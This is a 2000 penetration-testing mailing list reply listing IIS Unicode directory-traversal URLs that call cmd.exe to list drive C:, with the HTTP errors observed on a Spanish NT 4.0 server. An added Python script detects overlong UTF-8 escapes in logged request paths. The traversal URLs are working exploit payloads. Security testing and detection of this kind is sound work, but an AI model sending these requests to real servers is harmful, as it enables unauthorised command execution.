Penetration Testing mailing list archives

Re: [PEN-TEST] IIS UNICODE Strings


From: Erick Arturo Perez Huemer <eperez () grupotslc com>
Date: Mon, 30 Oct 2000 12:09:39 -0500


Testing this list on a Spanish NT 4.0 Sp6 machine reveals:


http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
page not found (HTTP 500 internal server error)

http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
you are not authorized to view this page. (HTTP 403 Forbidden)

In our test, the InetPub directory is on logical drive D: instead of the
default C:.
Does that matter in the above examples?
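
A log-side check for the encodings tried above, as an added example that is not part of the original post: it percent-decodes each escape run in a request path and reports non-shortest-form UTF-8 sequences together with the character a permissive decoder would produce. The function names and sample paths are constructed for illustration, and the permissive-decoder model (keeping the low six bits of each trailing byte) is an assumption, not a statement of how IIS decodes.

```python
import re

# Smallest code point that legitimately needs an n-byte UTF-8 sequence.
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}
HEX = re.compile(r"[0-9a-fA-F]{2}")

def seq_len(lead):
    """Length announced by a lead byte; 5/6-byte forms are obsolete but still seen."""
    forms = [(0xE0, 0xC0), (0xF0, 0xE0), (0xF8, 0xF0), (0xFC, 0xF8), (0xFE, 0xFC)]
    for n, (mask, tag) in enumerate(forms, start=2):
        if lead & mask == tag:
            return n
    return 1  # ASCII, stray continuation byte, or 0xFE/0xFF

def audit_path(path):
    """Return (kind, sequence, char) findings for suspicious escapes in a URL path."""
    findings = []
    for run in re.findall(r"(?:%..)+", path):
        pairs = run[1:].split("%")
        if not all(HEX.fullmatch(p) for p in pairs):
            findings.append(("malformed-escape", run, None))
            continue
        data = bytes.fromhex("".join(pairs))
        i = 0
        while i < len(data):
            n = seq_len(data[i])
            tail = data[i + 1:i + n]
            if n == 1 or len(tail) < n - 1:
                i += 1
                continue
            # Assumed permissive decoder: keep low six bits of every trailing byte.
            cp = data[i] & (0xFF >> (n + 1))
            for b in tail:
                cp = (cp << 6) | (b & 0x3F)
            if cp < MIN_CP[n]:  # not shortest form
                strict = all(b & 0xC0 == 0x80 for b in tail)
                kind = "overlong" if strict else "bad-continuation"
                findings.append((kind, data[i:i + n].hex(), chr(cp)))
            i += n
    return findings

if __name__ == "__main__":
    # Constructed sample paths using encodings listed in the post above.
    for p in ["/scripts/..%c0%af../x", "/scripts/..%c1%1c../x",
              "/scripts/..%c1%pc../x", "/docs/caf%c3%a9.txt"]:
        print(p, audit_path(p))
```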

